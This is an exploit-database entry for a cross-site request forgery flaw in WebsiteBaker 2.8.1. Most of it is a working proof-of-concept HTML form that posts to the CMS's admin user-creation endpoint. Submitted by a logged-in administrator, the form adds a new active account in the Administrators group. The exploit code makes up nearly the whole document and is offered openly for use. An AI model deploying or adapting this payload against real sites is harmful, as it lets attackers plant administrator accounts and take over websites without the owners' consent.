WebsiteBaker 2.8.1 CSRF Vulnerability

2010-06-19T00:00:00
ID 1337DAY-ID-12797
Type zdt
Reporter Luis Santana
Modified 2010-06-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================
WebsiteBaker 2.8.1 CSRF Vulnerability
=====================================

# Author: Luis Santana
# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
# Version: 2.8.1
# Tested on: All

Regards,
Luis Santana
Admin - http://hacktalk.net
HackTalk Security
 
<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
<form name="user"action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="username_fieldname" value="username_08y7h65u" />
 
<table cellpadding="5" cellspacing="0" border="0" width="100%">
<tr>
<td width="150">Username:</td>
<td class="value_input">
<input type="text" name="username_08y7h65u" maxlength="30" value="" />
</td>
</tr>
<tr>
<td>Password:</td>
 
<td class="value_input">
<input type="password" name="password" maxlength="30" />
</td>
</tr>
<tr>
<td>Re-type Password:</td>
<td class="value_input">
<input type="password" name="password2" maxlength="30" />
</td>
 
</tr>
<tr style="display:none;">
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
</tr>
<tr>
<td>Display Name:</td>
<td class="value_input">
<input type="text" name="display_name" maxlength="255" value="" />
 
</td>
</tr>
<tr>
<td>Email:</td>
<td class="value_input">
<input type="text" name="email" maxlength="255" value="" />
</td>
</tr>
<tr style="">
<td>Home Folder:</td>
 
<td class="value_input">
<select name="home_folder">
<option value="">None</option>
 
<option value="/testbild" >/media/testbild</option>
</select>
</td>
</tr>
<tr>
 
<td>Group:</td>
<td class="value_input">
<select name="groups[]" multiple="multiple" size="5">
 
<option value="1" >Administrators</option>
</select>
</td>
</tr>
<tr>
 
<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
<input type="radio" name="active[]" id="disabled" value="0" />
<label for="disabled">Disabled</label>
</td>
</tr>
 
<tr>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />
</td>
</tr>
</table>
 
</form>
 
 
<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>



#  0day.today [2018-03-12]  #